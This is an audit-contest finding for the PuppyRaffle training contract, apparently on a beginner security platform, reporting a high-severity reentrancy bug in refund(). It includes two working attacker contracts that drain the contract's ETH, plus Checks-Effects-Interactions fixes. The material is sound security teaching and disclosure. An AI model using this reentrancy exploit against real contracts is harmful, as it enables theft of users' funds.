Puppy Raffle

AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
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Submission Details
Severity: high
Valid

Reentrancy in refund allows draining the entire contract balance

Root + Impact

Description

The `refund` function is meant to return a player's entrance fee and mark their slot inactive by setting it to `address(0)`, so it can no longer be refunded. The problem is that `refund` violates the Checks-Effects-Interactions pattern: it sends ETH to the caller BEFORE zeroing out the player's slot. Because the state update runs after the external transfer, a malicious contract can re-enter `refund` from its `receive()` while its slot is still non-zero, passing all checks again and withdrawing repeatedly until the contract is drained.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
payable(msg.sender).sendValue(entranceFee); // @> external call BEFORE state update
players[playerIndex] = address(0); // @> state update runs too late
}

Risk

Likelihood:

  • Occurs whenever a player is a contract that calls refund and re-enters from its receive/fallback while its player slot is still non-zero.

  • Requires no special conditions beyond entering the raffle once and having funds from other players in the contract.

Impact:

  • An attacker drains the entire contract balance, including the entrance fees of all other legitimate players.

  • All raffle funds can be stolen in a single transaction, breaking the core guarantee of the protocol.

Proof of Concept

The attacker contract enters the raffle, calls refund, and re-enters from receive() while funds remain in the contract. The test drains the raffle from 5 ether to 0.

contract ReentrancyAttacker {
PuppyRaffle puppyRaffle;
uint256 entranceFee;
uint256 attackerIndex;
constructor(address _puppyRaffle) {
puppyRaffle = PuppyRaffle(_puppyRaffle);
entranceFee = puppyRaffle.entranceFee();
}
function attack() external payable {
address[] memory players = new address[](1);
players[0] = address(this);
puppyRaffle.enterRaffle{value: entranceFee}(players);
attackerIndex = puppyRaffle.getActivePlayerIndex(address(this));
puppyRaffle.refund(attackerIndex);
}
receive() external payable {
if (address(puppyRaffle).balance >= entranceFee) {
puppyRaffle.refund(attackerIndex);
}
}
}
// Test result: raffle balance 5 ether -> 0, attacker drains all funds. [PASS]

Recommended Mitigation

Update state before the external call (Checks-Effects-Interactions). Additionally, consider using OpenZeppelin's ReentrancyGuard on refund.

function refund(uint256 playerIndex) public {
address playerAddress = players[playerIndex];
require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund");
require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active");
+ players[playerIndex] = address(0);
+ emit RaffleRefunded(playerAddress);
payable(msg.sender).sendValue(entranceFee);
- players[playerIndex] = address(0);
- emit RaffleRefunded(playerAddress);
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 3 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-02] Reentrancy Vulnerability In refund() function

## Description The `PuppyRaffle::refund()` function doesn't have any mechanism to prevent a reentrancy attack and doesn't follow the Check-effects-interactions pattern ## Vulnerability Details ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); payable(msg.sender).sendValue(entranceFee); players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); } ``` In the provided PuppyRaffle contract is potentially vulnerable to reentrancy attacks. This is because it first sends Ether to msg.sender and then updates the state of the contract.a malicious contract could re-enter the refund function before the state is updated. ## Impact If exploited, this vulnerability could allow a malicious contract to drain Ether from the PuppyRaffle contract, leading to loss of funds for the contract and its users. ```javascript PuppyRaffle.players (src/PuppyRaffle.sol#23) can be used in cross function reentrancies: - PuppyRaffle.enterRaffle(address[]) (src/PuppyRaffle.sol#79-92) - PuppyRaffle.getActivePlayerIndex(address) (src/PuppyRaffle.sol#110-117) - PuppyRaffle.players (src/PuppyRaffle.sol#23) - PuppyRaffle.refund(uint256) (src/PuppyRaffle.sol#96-105) - PuppyRaffle.selectWinner() (src/PuppyRaffle.sol#125-154) ``` ## POC <details> ```solidity // SPDX-License-Identifier: MIT pragma solidity ^0.7.6; import "./PuppyRaffle.sol"; contract AttackContract { PuppyRaffle public puppyRaffle; uint256 public receivedEther; constructor(PuppyRaffle _puppyRaffle) { puppyRaffle = _puppyRaffle; } function attack() public payable { require(msg.value > 0); // Create a dynamic array and push the sender's address address[] memory players = new address[](1); players[0] = address(this); puppyRaffle.enterRaffle{value: msg.value}(players); } fallback() external payable { if (address(puppyRaffle).balance >= msg.value) { receivedEther += msg.value; // Find the index of the sender's address uint256 playerIndex = puppyRaffle.getActivePlayerIndex(address(this)); if (playerIndex > 0) { // Refund the sender if they are in the raffle puppyRaffle.refund(playerIndex); } } } } ``` we create a malicious contract (AttackContract) that enters the raffle and then uses its fallback function to repeatedly call refund before the PuppyRaffle contract has a chance to update its state. </details> ## Recommendations To mitigate the reentrancy vulnerability, you should follow the Checks-Effects-Interactions pattern. This pattern suggests that you should make any state changes before calling external contracts or sending Ether. Here's how you can modify the refund function: ```javascript function refund(uint256 playerIndex) public { address playerAddress = players[playerIndex]; require(playerAddress == msg.sender, "PuppyRaffle: Only the player can refund"); require(playerAddress != address(0), "PuppyRaffle: Player already refunded, or is not active"); // Update the state before sending Ether players[playerIndex] = address(0); emit RaffleRefunded(playerAddress); // Now it's safe to send Ether (bool success, ) = payable(msg.sender).call{value: entranceFee}(""); require(success, "PuppyRaffle: Failed to refund"); } ``` This way, even if the msg.sender is a malicious contract that tries to re-enter the refund function, it will fail the require check because the player's address has already been set to address(0).Also we changed the event is emitted before the external call, and the external call is the last step in the function. This mitigates the risk of a reentrancy attack.

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